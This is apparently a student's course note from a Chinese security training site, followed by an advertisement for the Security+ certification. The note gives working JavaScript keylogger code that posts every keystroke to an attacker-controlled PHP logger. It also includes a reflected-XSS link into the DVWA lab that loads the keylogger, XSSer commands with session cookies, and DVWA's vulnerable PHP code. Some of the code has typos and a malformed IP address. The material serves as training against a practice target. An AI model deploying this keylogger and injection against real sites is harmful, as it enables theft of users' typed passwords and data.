[email protected]:~# service apache2 start

[email protected]:~# cd /var/www/html/

[email protected]:/var/www/html# gedit keylogger.js

document.onkeypress = function(evt){

    evt = evt || window.event

    key = String.fromCharCode(evt.charCode)

    if(key){

        var http = new XMLHttpRequest();

        var param = encodeUR(key);

        http.open("POST","http://192.168.20.8/keylogger.php",true);

        http.setRequestHeader("Content-type","application/x-www-form-urlencoded");

        http.send("key="+param);

    }

}

[email protected]:/var/www/html# gedit keylogger.php

    <?php

    $key=$_POST['key'];

    $logfile="keylog.txt";

    $fp = fopen($logfile,"a");

    fwrite($fp,$key);

    fclose($fp);

    ?>

[email protected]:/var/www/html# gedit keylogger.txt

[email protected]:/var/www/html# ls

index.html  keylogger.js  keylogger.php  keylog.txt

[email protected]:/var/www/html# chmod 777 keylog.txt

[email protected]:/var/www/html# gedit a.html

<a herf="http://192.168.1.107/dvwa/vulnerabilites/xss_r/?name=<script+src='http://192.168.1.1.102/keylogger.js'></script>">xss</a>

[email protected]:~# xsser --help

Usage: 

xsser [OPTIONS] [-u <url> |-i <file> |-d <dork>] [-g <get> |-p <post> |-c <crawl>] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]

Cross Site "Scripter" is an automatic -framework- to detect, exploit and

report XSS vulnerabilities in web-based applications.

Options:

  --version             show program's version number and exit

  -h, --help            show this help message and exit

  -s, --statistics      show advanced statistics output results

  -v, --verbose         active verbose mode output results

  --gtk                 launch XSSer GTK Interface (Wizard included!)

  *Special Features*:

    You can choose Vector(s) and Bypasser(s) to inject code with this

    extra special features:

    --imx=IMX           create a false image with XSS code embedded

    --fla=FLASH         create a false .swf file with XSS code embedded

  *Select Target(s)*:

    At least one of these options has to be specified to set the source to

    get target(s) urls from. You need to choose to run XSSer:

    -u URL, --url=URL   Enter target(s) to audit

    -i READFILE         Read target urls from a file

    -d DORK             Process search engine dork results as target urls

    --De=DORK_ENGINE    Search engine to use for dorking (bing, altavista,

                        yahoo, baidu, yandex, youdao, webcrawler, google, etc.

                        See dork.py file to check for available engines)

  *Select type of HTTP/HTTPS Connection(s)*:

    These options can be used to specify which parameter(s) we want to use

    like payload to inject code.

    -g GETDATA          Enter payload to audit using GET (ex: '/menu.php?q=')

    -p POSTDATA         Enter payload to audit using POST (ex: 'foo=1&bar=')

    -c CRAWLING         Number of urls to crawl on target(s): 1-99999

    --Cw=CRAWLER_WIDTH  Deeping level of crawler: 1-5

    --Cl                Crawl only local target(s) urls (default TRUE)

  *Configure Request(s)*:

    These options can be used to specify how to connect to target(s)

    payload(s). You can choose multiple:

    --cookie=COOKIE     Change your HTTP Cookie header

    --drop-cookie       Ignore Set-Cookie header from response

    --user-agent=AGENT  Change your HTTP User-Agent header (default SPOOFED)

    --referer=REFERER   Use another HTTP Referer header (default NONE)

    --xforw             Set your HTTP X-Forwarded-For with random IP values

    --xclient           Set your HTTP X-Client-IP with random IP values

    --headers=HEADERS   Extra HTTP headers newline separated

    --auth-type=ATYPE   HTTP Authentication type (Basic, Digest, GSS or NTLM)

    --auth-cred=ACRED   HTTP Authentication credentials (name:password)

    --proxy=PROXY       Use proxy server (tor: http://localhost:8118)

    --ignore-proxy      Ignore system default HTTP proxy

    --timeout=TIMEOUT   Select your timeout (default 30)

    --retries=RETRIES   Retries when the connection timeouts (default 1)

    --threads=THREADS   Maximum number of concurrent HTTP requests (default 5)

    --delay=DELAY       Delay in seconds between each HTTP request (default 0)

    --tcp-nodelay       Use the TCP_NODELAY option

    --follow-redirects  XSSer will follow server redirection responses (302)

    --follow-limit=FLI  Set how many times XSSer will follow redirections

                        (default 50)

  *Checker Systems*:

    This options are usefull to know if your target(s) have some filters

    against XSS attacks, to reduce 'false positive' results and to perform

    more advanced tests:

    --no-head                       NOT verify the stability of the url (codes: 200|302)

                                           with a HEAD pre-check request

    --alive=ISALIVE              set limit of every how much errors XSSer must to

                                           verify that target is alive

    --hash                             send an unique hash, without vectors, to pre-check if

                                            target(s) repeats all content recieved

    --heuristic                       launch a heuristic testing to discover which

                                           parameters are filtered on target(s) code: ;\/<>"'=

    --checkaturl=ALT           check for a valid XSS response from target(s) at an

                                           alternative url. 'blind XSS'

    --checkmethod=ALTM  check responses from target(s) using a different

                                           connection type: GET or POST (default: GET)

    --checkatdata=ALD       check responses from target(s) using an alternative

                                           payload (default: same than first injection)

    --reverse-check              establish a reverse connection from target(s) to XSSer

                                           to certificate that is 100% vulnerable

  *Select Vector(s)*:

    These options can be used to specify a XSS vector source code to

    inject in each payload. Important, if you don't want to try to inject

    a common XSS vector, used by default. Choose only one option:

    --payload=SCRIPT    OWN  - Insert your XSS construction -manually-

    --auto                       AUTO - Insert XSSer 'reported' vectors from file

                                     (HTML5 vectors included!)

  *Select Bypasser(s)*:

    These options can be used to encode selected vector(s) to try to

    bypass possible anti-XSS filters on target(s) code and possible IPS

    rules, if the target use it. Also, can be combined with other

    techniques to provide encoding:

    --Str                      Use method String.FromCharCode()

    --Une                    Use Unescape() function

    --Mix                     Mix String.FromCharCode() and Unescape()

    --Dec                     Use Decimal encoding

    --Hex                     Use Hexadecimal encoding

    --Hes                     Use Hexadecimal encoding, with semicolons

    --Dwo                    Encode vectors IP addresses in DWORD

    --Doo                     Encode vectors IP addresses in Octal

    --Cem=CEM           Try -manually- different Character Encoding Mutations

                                  (reverse obfuscation: good) -> (ex: 'Mix,Une,Str,Hex')

  *Special Technique(s)*:

    These options can be used to try to inject code using different type

    of XSS techniques. You can choose multiple:

    --Coo                COO - Cross Site Scripting Cookie injection

    --Xsa                 XSA - Cross Site Agent Scripting

    --Xsr                  XSR - Cross Site Referer Scripting

    --Dcp                 DCP - Data Control Protocol injections

    --Dom               DOM - Document Object Model injections

    --Ind                  IND - HTTP Response Splitting Induced code

    --Anchor            ANC - Use Anchor Stealth payloader (DOM shadows!)

    --Phpids             PHP - Exploit PHPIDS bug (0.6.5) to bypass filters

  *Select Final injection(s)*:

    These options can be used to specify the final code to inject in

    vulnerable target(s). Important, if you want to exploit on-the-wild

    your discovered vulnerabilities. Choose only one option:

    --Fp=FINALPAYLOAD   OWN    - Insert your final code to inject -manually-

    --Fr=FINALREMOTE      REMOTE - Insert your final code to inject -remotelly-

    --Doss                           DOSs   - XSS Denial of service (server) injection

    --Dos                             DOS    - XSS Denial of service (client) injection

    --B64                             B64    - Base64 code encoding in META tag (rfc2397)

  *Special Final injection(s)*:

    These options can be used to execute some 'special' injection(s) in

    vulnerable target(s). You can select multiple and combine with your

    final code (except with DCP code):

    --Onm               ONM - Use onMouseMove() event to inject code

    --Ifr                   IFR - Use <iframe> source tag to inject code

  *Miscellaneous*:

    --silent                          inhibit console output results

    --update                       check for XSSer latest stable version

    --save                           output all results directly to template (XSSlist.dat)

    --xml=FILEXML            output 'positives' to aXML file (--xml filename.xml)

    --short=SHORTURLS   display -final code- shortered (tinyurl, is.gd)

    --launch                       launch a browser at the end with each XSS discovered

    --tweet                         publish each XSS discovered into the 'Grey Swarm!'

    --tweet-tags=TT          add more tags to your XSS discovered publications

                                        (default: #xss) - (ex: #xsser #vulnerability)  

[email protected]:~# xsser --gtk       //xsser圖形化工具啟動

[email protected]:~# xsser -u http://192.168.1.107/dvwa/vulnerabilities/" -g "xss_r/?name=" --cookie="security=low;PHPSESSID=d23e439411707ff8210717e67c521a81" -s -v --reverse-check

[email protected]:~# xsser -u http://192.168.107/dvwa/vulnerabilities/" -g "xss_r/?name=" --cookie="security=low;PHPSESSID=dd344b59dd74665c29bd031d035090f" --Cem='Mix,Une,Str,Hex

----------------------------------------------------------------

低安全程式碼

<?php

if(!array_key_exists ("name",$_GET) | $_GET['name'] == NULL || $_GET['name'] ==''){

    $isempty = ture;

} else {

    echo '<pre>';

    echo 'hello'.$_GET['name'];

    echo '</pre>'

}

?>

----------------------------------------------------------------------

該筆記為安全牛課堂學員筆記，想看此課程或者資訊保安類乾貨可以移步到安全牛課堂

Security+認證為什麼是網際網路+時代最火爆的認證？

      牛妹先給大家介紹一下Security+

        Security+ 認證是一種中立第三方認證，其發證機構為美國計算機行業協會CompTIA ；是和CISSP、ITIL 等共同包含在內的國際 IT 業 10 大熱門認證之一，和CISSP偏重資訊保安管理相比，Security+ 認證更偏重資訊保安技術和操作。

       通過該認證證明了您具備網路安全，合規性和操作安全，威脅和漏洞，應用程式、資料和主機安全，訪問控制和身份管理以及加密技術等方面的能力。因其考試難度不易，含金量較高，目前已被全球企業和安全專業人士所普遍採納。

Security+認證如此火爆的原因？  

       原因一：在所有資訊保安認證當中，偏重資訊保安技術的認證是空白的， Security+認證正好可以彌補資訊保安技術領域的空白 。

      目前行業內受認可的資訊保安認證主要有CISP和CISSP，但是無論CISP還是CISSP都是偏重資訊保安管理的，技術知識講的寬泛且淺顯，考試都是一帶而過。而且CISSP要求持證人員的資訊保安工作經驗都要5年以上，CISP也要求大專學歷4年以上工作經驗，這些要求無疑把有能力且上進的年輕人的持證之路堵住。在現實社會中，無論是找工作還是升職加薪，或是投標時候報人員，認證都是必不可少的，這給年輕人帶來了很多不公平。而Security+的出現可以掃清這些年輕人職業發展中的障礙，由於Security+偏重資訊保安技術，所以對工作經驗沒有特別的要求。只要你有IT相關背景，追求進步就可以學習和考試。

       原因二： IT運維人員工作與翻身的利器。

       在銀行、證券、保險、資訊通訊等行業，IT運維人員非常多，IT運維涉及的工作面也非常廣。是一個集網路、系統、安全、應用架構、儲存為一體的綜合性技術崗。雖然沒有程式猿們“生當做光棍，死亦寫程式碼”的悲壯，但也有著“鋤禾日當午，不如運維苦“的感慨。天天對著電腦和機器，時間長了難免有對於職業發展的迷茫和困惑。Security+國際認證的出現可以讓有追求的IT運維人員學習網路安全知識，掌握網路安全實踐。職業發展朝著網路安全的方向發展，解決國內資訊保安人才的匱乏問題。另外，即使不轉型，要做好運維工作，學習安全知識取得安全認證也是必不可少的。

        原因三：接地氣、國際範兒、考試方便、費用適中！

CompTIA作為全球ICT領域最具影響力的全球領先機構,在資訊保安人才認證方面是專業、公平、公正的。Security+認證偏重操作且和一線工程師的日常工作息息相關。適合銀行、證券、保險、網際網路公司等IT相關人員學習。作為國際認證在全球147個國家受到廣泛的認可。

        在目前的資訊保安大潮之下，人才是資訊保安發展的關鍵。而目前國內的資訊保安人才是非常匱乏的，相信Security+認證一定會成為最火爆的資訊保安認證。